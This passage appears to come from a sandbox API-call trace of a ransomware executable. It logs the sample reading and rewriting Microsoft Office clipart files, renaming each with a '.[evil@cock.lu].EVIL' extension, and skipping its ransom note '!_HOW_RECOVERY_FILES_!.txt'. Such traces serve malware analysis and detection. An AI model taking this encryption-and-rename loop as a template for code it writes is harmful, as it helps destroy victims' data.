_Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 69 [0110.477] wcscmp (_String1="BL00254_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.477] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00254_.WMF") returned 0x0 [0110.477] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 0x45 [0110.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.479] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6c8, lpOverlapped=0x0) returned 1 [0110.481] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.481] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.481] _errno () returned 0x84b1160840 [0110.481] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.481] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6e0, lpOverlapped=0x0) returned 1 [0110.481] CloseHandle (hObject=0x1a8) returned 1 [0110.482] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.482] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.482] __uncaught_exception () returned 0x84b1160800 [0110.482] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.482] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf.[evil@cock.lu].evil")) returned 1 [0110.483] ??_V@YAXPEAX@Z () returned 0x1 [0110.486] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF", dwFileAttributes=0x200) returned 0 [0110.486] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.486] wcsstr (_Str="BL00261_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.487] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 69 [0110.487] wcscmp (_String1="BL00261_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.487] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00261_.WMF") returned 0x0 [0110.487] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 0x45 [0110.487] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.489] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30c2, lpOverlapped=0x0) returned 1 [0110.503] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.503] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.503] _errno () returned 0x84b1160840 [0110.503] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.503] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30e0, lpOverlapped=0x0) returned 1 [0110.503] CloseHandle (hObject=0x1a8) returned 1 [0110.503] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.504] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.504] __uncaught_exception () returned 0x84b1160800 [0110.504] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.504] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf.[evil@cock.lu].evil")) returned 1 [0110.505] ??_V@YAXPEAX@Z () returned 0x1 [0110.508] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF", dwFileAttributes=0x200) returned 0 [0110.508] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.509] wcsstr (_Str="BL00262_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.509] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 69 [0110.509] wcscmp (_String1="BL00262_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.509] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00262_.WMF") returned 0x0 [0110.509] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 0x45 [0110.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.511] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9fc, lpOverlapped=0x0) returned 1 [0110.514] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.514] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.514] _errno () returned 0x84b1160840 [0110.514] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.514] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa00, lpOverlapped=0x0) returned 1 [0110.514] CloseHandle (hObject=0x1a8) returned 1 [0110.514] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.515] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.515] __uncaught_exception () returned 0x84b1160800 [0110.515] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.515] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.[evil@cock.lu].evil")) returned 1 [0110.516] ??_V@YAXPEAX@Z () returned 0x1 [0110.519] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF", dwFileAttributes=0x200) returned 0 [0110.520] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.520] wcsstr (_Str="BL00265_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.520] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 69 [0110.520] wcscmp (_String1="BL00265_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.520] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00265_.WMF") returned 0x0 [0110.520] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 0x45 [0110.520] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.522] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1678, lpOverlapped=0x0) returned 1 [0110.530] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.530] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.530] _errno () returned 0x84b1160840 [0110.530] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.530] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1680, lpOverlapped=0x0) returned 1 [0110.531] CloseHandle (hObject=0x1a8) returned 1 [0110.531] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.531] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.531] __uncaught_exception () returned 0x84b1160800 [0110.531] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.532] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf.[evil@cock.lu].evil")) returned 1 [0110.532] ??_V@YAXPEAX@Z () returned 0x1 [0110.536] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF", dwFileAttributes=0x200) returned 0 [0110.536] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.536] wcsstr (_Str="BL00267_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.536] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 69 [0110.536] wcscmp (_String1="BL00267_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.536] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00267_.WMF") returned 0x0 [0110.536] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 0x45 [0110.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.539] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa54, lpOverlapped=0x0) returned 1 [0110.549] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.549] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.549] _errno () returned 0x84b1160840 [0110.549] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.549] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa60, lpOverlapped=0x0) returned 1 [0110.550] CloseHandle (hObject=0x1a8) returned 1 [0110.550] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.550] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.550] __uncaught_exception () returned 0x84b1160800 [0110.550] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.550] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf.[evil@cock.lu].evil")) returned 1 [0110.551] ??_V@YAXPEAX@Z () returned 0x1 [0110.554] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF", dwFileAttributes=0x200) returned 0 [0110.554] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.554] wcsstr (_Str="BL00269_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.554] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 69 [0110.554] wcscmp (_String1="BL00269_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.554] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00269_.WMF") returned 0x0 [0110.554] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 0x45 [0110.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.555] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1498, lpOverlapped=0x0) returned 1 [0110.630] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.630] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.630] _errno () returned 0x84b1160840 [0110.630] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.630] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0110.630] CloseHandle (hObject=0x1a8) returned 1 [0110.630] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.630] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.630] __uncaught_exception () returned 0x84b1160800 [0110.630] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.631] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.[evil@cock.lu].evil")) returned 1 [0110.631] ??_V@YAXPEAX@Z () returned 0x1 [0110.634] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF", dwFileAttributes=0x200) returned 0 [0110.634] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.634] wcsstr (_Str="BL00270_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.634] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 69 [0110.634] wcscmp (_String1="BL00270_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00270_.WMF") returned 0x0 [0110.634] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 0x45 [0110.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.636] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbc8, lpOverlapped=0x0) returned 1 [0110.646] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.646] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.646] _errno () returned 0x84b1160840 [0110.646] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.646] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0110.646] CloseHandle (hObject=0x1a8) returned 1 [0110.646] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.646] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.647] __uncaught_exception () returned 0x84b1160800 [0110.647] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.647] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.[evil@cock.lu].evil")) returned 1 [0110.647] ??_V@YAXPEAX@Z () returned 0x1 [0110.650] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF", dwFileAttributes=0x200) returned 0 [0110.650] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.650] wcsstr (_Str="BL00273_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.650] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 69 [0110.650] wcscmp (_String1="BL00273_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.650] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00273_.WMF") returned 0x0 [0110.650] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 0x45 [0110.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.652] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xec4, lpOverlapped=0x0) returned 1 [0110.662] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.662] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.662] _errno () returned 0x84b1160840 [0110.662] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.662] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee0, lpOverlapped=0x0) returned 1 [0110.662] CloseHandle (hObject=0x1a8) returned 1 [0110.662] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.663] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.663] __uncaught_exception () returned 0x84b1160800 [0110.663] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.663] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.[evil@cock.lu].evil")) returned 1 [0110.663] ??_V@YAXPEAX@Z () returned 0x1 [0110.666] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF", dwFileAttributes=0x200) returned 0 [0110.666] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.666] wcsstr (_Str="BL00274_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.666] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 69 [0110.666] wcscmp (_String1="BL00274_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.666] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00274_.WMF") returned 0x0 